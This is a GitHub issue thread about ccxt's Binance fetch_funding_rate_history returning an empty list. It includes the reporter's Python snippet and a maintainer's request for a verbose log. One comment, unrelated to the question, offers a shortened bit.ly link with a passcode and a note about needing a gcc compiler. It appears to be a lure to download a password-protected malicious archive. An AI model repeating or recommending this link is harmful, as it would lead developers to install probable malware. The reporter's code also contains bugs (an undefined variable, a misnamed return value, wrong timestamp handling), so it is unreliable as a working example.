### ISSUE TITLE
binance:  fetch_funding_rate_history return [] value

### ISSUE THREAD

**Issue by cymqqqq** [ccxt/ccxt#23648]
### Operating System

m2 mac

### Programming Languages

Python

### CCXT Version

4.3.96

### Description

test binance `fetch_funding_rate_history` api but returns nothing, results and parameters:
<img width="553" alt="image" src="https://github.com/user-attachments/assets/ed74546e-9d2d-4442-80ac-49cdbba4ff31">
<img width="543" alt="image" src="https://github.com/user-attachments/assets/22397d53-c9ef-4ae6-a08e-9b0f4f1f6141">
<img width="454" alt="image" src="https://github.com/user-attachments/assets/ebfd26ad-020c-490a-99eb-e58e93b111f5">
<img width="759" alt="image" src="https://github.com/user-attachments/assets/42bf1d1c-5b08-4274-8cdd-422786063ea2">

### Code

```
  
def binance_get_history_funding_rate(self, symbol, start_time, end_time, limit):
        binance = self.binance_usdm_config()
        params = {}
        params['symbol'] = str(symbol)
        params['since'] = int(start_time)
        params['limit'] = int(limit)
        params['endTime'] = int(end_time)
        history = binance.fetch_funding_rate_history(symbol=symbol, since=since, limit=limit, params=params)
        
        return history
def binance_usdm_config(self):
        binance = ccxt.binance({
        'enableRateLimit': True,
        'options': {
        'defaultType': 'swap',  # ←-------------- quotes and 'future'
        },
        'apiKey': os.getenv('BINANCE_API_KEY'),
        'secret': os.getenv("BINANCE_SECRET_KEY"),
        'verbose': False,  # switch it to False if you don't want the HTTP log
    })
        return finance

symbol = "BTC/USDT:USDT"
    since = int(datetime.fromisoformat("2024-06-01T00:00:00.000").microsecond)
    end = int(datetime.fromisoformat("2024-06-05T00:00:00.000").microsecond)
    limit = 10 
```

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by carlosmiei** [comment]
Hello @cymqqqq, can you please post a verbose log?

You can enable it by doing:
```Python
binance.load_markets()
binance.verbose = True
```

**Comment by cymqqqq** [comment]
Hi @carlosmiei ,I tried verbose=True, and it did print something, but....the results looks weird
<img width="1384" alt="image" src="https://github.com/user-attachments/assets/c3dc1e44-36b3-4618-b2fb-c687fca5702e">

**Comment by cymqqqq** [comment]
thanks for answering, I have fixed it :)
